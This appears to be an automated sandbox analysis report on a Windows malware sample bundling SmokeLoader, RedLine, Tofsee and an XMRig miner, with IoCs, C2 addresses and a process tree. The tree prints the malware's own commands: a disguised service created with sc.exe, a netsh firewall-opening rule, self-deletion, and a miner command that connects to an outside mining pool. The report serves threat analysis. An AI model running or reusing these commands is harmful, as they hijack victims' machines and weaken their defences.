Overview

overview

10

Static

static

7687054ef7...54.exe

windows7_x64

10

7687054ef7...54.exe

windows10_x64

10

Analysis

  • max time kernel
    151s
  • max time network
    153s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    29-09-2021 17:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    7687054ef76c0842a827c7249c7c5454.exe

  • Size

    221KB

  • MD5

    7687054ef76c0842a827c7249c7c5454

  • SHA1

    da4177807371fa64acc17dfdd0fa0b6d6c39a8b7

  • SHA256

    f085d79b0b46ad9eda7f2191e2e668314553251ab5d0f4936f84cd2c1afa2564

  • SHA512

    2e32bfffb654c0372fc190f859152bd60136cbeb182a6f64f7f12ae46641f2b1fc498c87dd3513d015fcf9f6187ec6287cfe37660b42b474562137605452773a

Score
10/10
redlinesmokeloadertofseexmrigbackdoordiscoveryevasioninfostealerminerpersistencespywarestealertrojan

Malware Config

Extracted

Family

smokeloader

Version

2020

C2

http://fiskahlilian16.top/

http://paishancho17.top/

http://ydiannetter18.top/

http://azarehanelle19.top/

http://quericeriant20.top/
rc4.i32
rc4.i32

Extracted

Family

redline

C2

92.246.89.6:38437

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

    infostealerredline
  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

    trojanbackdoorsmokeloader
  • Tofsee

    Backdoor/botnet which carries out malicious activities based on commands from a C2 server.

    trojantofsee
  • Windows security bypass 2 TTPs
    evasiontrojan
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

    minerxmrig
  • XMRig Miner Payload 3 IoCs
    miner
  • Creates new service(s) 1 TTPs
    persistence
  • Downloads MZ/PE file
  • Executes dropped EXE 8 IoCs
  • Modifies Windows Firewall 1 TTPs
    evasion
  • Sets service image path in registry 2 TTPs
    persistence
  • Deletes itself 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spywarestealer
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
    spyware
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

    discovery
  • Looks up external IP address via web service 6 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 2 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Launches sc.exe

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Checks SCSI registry key(s) 3 TTPs 6 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Modifies data under HKEY_USERS 13 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 56 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe
    "C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3464
    • C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe
      "C:\Users\Admin\AppData\Local\Temp\7687054ef76c0842a827c7249c7c5454.exe"
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      PID:3344
  • C:\Users\Admin\AppData\Local\Temp\F62D.exe
    C:\Users\Admin\AppData\Local\Temp\F62D.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:3736
    • C:\Users\Admin\AppData\Local\Temp\F62D.exe
      C:\Users\Admin\AppData\Local\Temp\F62D.exe
      2⤵
      • Executes dropped EXE
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:3120
  • C:\Users\Admin\AppData\Local\Temp\FF08.exe
    C:\Users\Admin\AppData\Local\Temp\FF08.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of SetThreadContext
    • Suspicious use of WriteProcessMemory
    PID:4164
    • C:\Users\Admin\AppData\Local\Temp\FF08.exe
      C:\Users\Admin\AppData\Local\Temp\FF08.exe
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:4076
  • C:\Users\Admin\AppData\Local\Temp\36D2.exe
    C:\Users\Admin\AppData\Local\Temp\36D2.exe
    1⤵
    • Executes dropped EXE
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:4432
    • C:\Users\Admin\AppData\Roaming\36D2.exe
      "C:\Users\Admin\AppData\Roaming\36D2.exe"
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3132
      • C:\Windows\SysWOW64\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "
        3⤵
          PID:4960
          • C:\Windows\SysWOW64\chcp.com
            chcp 1251
            4⤵
              PID:4668
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del C:\Users\Admin\AppData\Roaming\36D2.exe
            3⤵
              PID:4336
              • C:\Windows\SysWOW64\choice.exe
                choice /C Y /N /D Y /T 0
                4⤵
                  PID:2848
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Self.bat" "
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:508
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                3⤵
                  PID:704
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 0 &Del 36D2.exe
                2⤵
                • Suspicious use of WriteProcessMemory
                PID:1520
                • C:\Windows\SysWOW64\choice.exe
                  choice /C Y /N /D Y /T 0
                  3⤵
                    PID:1812
              • C:\Users\Admin\AppData\Local\Temp\4819.exe
                C:\Users\Admin\AppData\Local\Temp\4819.exe
                1⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:1404
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C mkdir C:\Windows\SysWOW64\sfusfiok\
                  2⤵
                    PID:2524
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\System32\cmd.exe" /C move /Y "C:\Users\Admin\AppData\Local\Temp\dpkhonnb.exe" C:\Windows\SysWOW64\sfusfiok\
                    2⤵
                      PID:2820
                    • C:\Windows\SysWOW64\sc.exe
                      "C:\Windows\System32\sc.exe" create sfusfiok binPath= "C:\Windows\SysWOW64\sfusfiok\dpkhonnb.exe /d\"C:\Users\Admin\AppData\Local\Temp\4819.exe\"" type= own start= auto DisplayName= "wifi support"
                      2⤵
                        PID:3868
                      • C:\Windows\SysWOW64\sc.exe
                        "C:\Windows\System32\sc.exe" description sfusfiok "wifi internet conection"
                        2⤵
                          PID:4820
                        • C:\Windows\SysWOW64\sc.exe
                          "C:\Windows\System32\sc.exe" start sfusfiok
                          2⤵
                            PID:1356
                          • C:\Windows\SysWOW64\netsh.exe
                            "C:\Windows\System32\netsh.exe" advfirewall firewall add rule name="Host-process for services of Windows" dir=in action=allow program="C:\Windows\SysWOW64\svchost.exe" enable=yes>nul
                            2⤵
                              PID:1100
                          • C:\Windows\SysWOW64\sfusfiok\dpkhonnb.exe
                            C:\Windows\SysWOW64\sfusfiok\dpkhonnb.exe /d"C:\Users\Admin\AppData\Local\Temp\4819.exe"
                            1⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:5044
                            • C:\Windows\SysWOW64\svchost.exe
                              svchost.exe
                              2⤵
                              • Drops file in System32 directory
                              • Suspicious use of SetThreadContext
                              • Modifies data under HKEY_USERS
                              PID:4640
                              • C:\Windows\SysWOW64\svchost.exe
                                svchost.exe -o fastpool.xyz:10060 -u 9rLbTvsApFs3i3ojk5hDKicMNRQbxxFGwJA2hNC6NoZZDQN5tTFbhviFm4W3koxSrPg87Lnif7qxFYh9xpTJz1cT6B17Ph4.50000 -p x -k -a cn/half
                                3⤵
                                • Suspicious use of AdjustPrivilegeToken
                                PID:3576

                          Network

                          MITRE ATT&CK Enterprise v6

                          Replay Monitor

                          Loading Replay Monitor...

                          Downloads

                          • memory/1404-185-0x0000000000400000-0x0000000000448000-memory.dmp

                            Filesize

                            288KB

                            Download

                          • memory/1404-184-0x0000000001F40000-0x0000000001F53000-memory.dmp

                            Filesize

                            76KB

                            Download

                          • memory/3044-146-0x0000000004910000-0x0000000004925000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/3044-118-0x0000000000DD0000-0x0000000000DE5000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/3132-174-0x0000000005790000-0x0000000005791000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/3132-180-0x0000000006CF0000-0x0000000006CF1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/3132-190-0x0000000007210000-0x000000000723A000-memory.dmp

                            Filesize

                            168KB

                            Download

                          • memory/3344-115-0x0000000000400000-0x0000000000409000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/3464-117-0x00000000006C0000-0x00000000006C9000-memory.dmp

                            Filesize

                            36KB

                            Download

                          • memory/3576-211-0x0000000000900000-0x00000000009F1000-memory.dmp

                            Filesize

                            964KB

                            Download

                          • memory/3576-206-0x0000000000900000-0x00000000009F1000-memory.dmp

                            Filesize

                            964KB

                            Download

                          • memory/4076-141-0x0000000005470000-0x0000000005471000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-134-0x0000000000400000-0x0000000000422000-memory.dmp

                            Filesize

                            136KB

                            Download

                          • memory/4076-140-0x00000000059E0000-0x00000000059E1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-142-0x00000000055A0000-0x00000000055A1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-143-0x00000000054F0000-0x00000000054F1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-153-0x0000000008010000-0x0000000008011000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-151-0x00000000071D0000-0x00000000071D1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-148-0x00000000075E0000-0x00000000075E1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-147-0x0000000006EE0000-0x0000000006EE1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4076-145-0x00000000053D0000-0x00000000059D6000-memory.dmp

                            Filesize

                            6.0MB

                            Download

                          • memory/4076-144-0x0000000005530000-0x0000000005531000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4164-133-0x0000000005E00000-0x0000000005E01000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4164-125-0x0000000000EC0000-0x0000000000EC1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4164-127-0x0000000005710000-0x0000000005711000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4164-131-0x00000000056B0000-0x00000000056B1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4164-132-0x00000000058F0000-0x00000000058F1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4432-159-0x0000000004A10000-0x0000000004A61000-memory.dmp

                            Filesize

                            324KB

                            Download

                          • memory/4432-160-0x0000000000850000-0x0000000000851000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4432-162-0x0000000004AF0000-0x0000000004AF1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4432-157-0x00000000000E0000-0x00000000000E1000-memory.dmp

                            Filesize

                            4KB

                            Download

                          • memory/4640-197-0x0000000000CF0000-0x0000000000D05000-memory.dmp

                            Filesize

                            84KB

                            Download

                          • memory/5044-201-0x0000000000400000-0x0000000000448000-memory.dmp

                            Filesize

                            288KB

                            Download